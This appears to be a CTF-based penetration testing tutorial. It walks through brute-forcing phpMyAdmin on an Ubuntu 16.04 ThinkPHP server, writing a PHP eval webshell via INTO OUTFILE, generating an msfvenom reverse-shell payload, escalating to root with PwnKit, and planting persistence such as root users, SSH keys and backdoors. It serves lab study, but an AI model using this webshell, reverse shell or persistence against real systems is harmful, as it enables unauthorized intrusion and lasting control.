Step‑by‑Step Webshell Upload and Kernel Privilege Escalation on Ubuntu 16.04

Introduction

After completing two CTF challenges, the author revisits the material to provide a comprehensive reference for beginners tackling internal network penetration, focusing on privilege escalation and omitting code‑audit details.

Target Environment

System: Ubuntu 16.04 (kernel 4.15.0) with a web stack of PHP, MySQL, and ThinkPHP.

Attack Flow

Initial Access

The target is accessed via a browser; the ThinkPHP version is old and typically customized, making direct Nday exploitation unlikely. Instead, the focus is on uploading a webshell.

Webshell Upload Process

Information Gathering

A simple directory scan reveals a phpMyAdmin login page, which is brute‑forced to obtain credentials.

MySQL Information

After logging in, check secure_file_priv (NULL or a specific path) and MySQL version to determine if INTO OUTFILE can write files to the web root.

Prerequisites for MySQL‑based Webshell

secure_file_priv

is not NULL or points to a writable directory.

The phpMyAdmin directory owner has write permissions on other directories.

Global gpc is disabled (default in MySQL 5.3.29+).

Root database user access.

Known target path obtained during reconnaissance.

Writing the Webshell

Two methods are demonstrated:

SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/ruchong.php';

or using general/slow query logs to inject the payload.

Connecting to the Webshell

If function disabling is not in effect, tools like 菜刀 can be used; otherwise, 蚁剑 with plugins can bypass restrictions.

Privilege Escalation

Kernel Escalation

Preparation

Identify kernel version with uname -a. Search for applicable exploits on Exploit‑DB, Kali’s searchsploit, or GitHub scripts (e.g., linux-exploit-suggester.sh).

Metasploit Payload

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.128 LPORT=6666 -f elf > ruchong.elf

Transfer the ELF to the target (e.g., via python3 -m http.server), set execute permissions, and run it to obtain a reverse shell.

Kernel Exploit

Use CVE‑2021‑4034 (PwnKit) script downloaded from GitHub, upload via the webshell, and execute through Metasploit to gain root.

Post‑Exploitation Persistence

Create a new root‑privileged user.

Enable SSH login with a root key pair.

Add a root‑owned cron job.

Deploy a “dead horse” or memory‑resident backdoor.

Modify startup scripts.

Other Escalation Techniques

Briefly mentions SUID hunting, sudo abuse, cron exploitation, and MySQL privilege escalation (CVE‑2016‑6663).

Conclusion

The article provides a detailed walkthrough of internal network exploitation, from initial reconnaissance to webshell deployment, reverse‑shell establishment, kernel privilege escalation, and persistence. Future posts will cover lateral movement, advanced post‑exploitation, and platform‑specific escalation.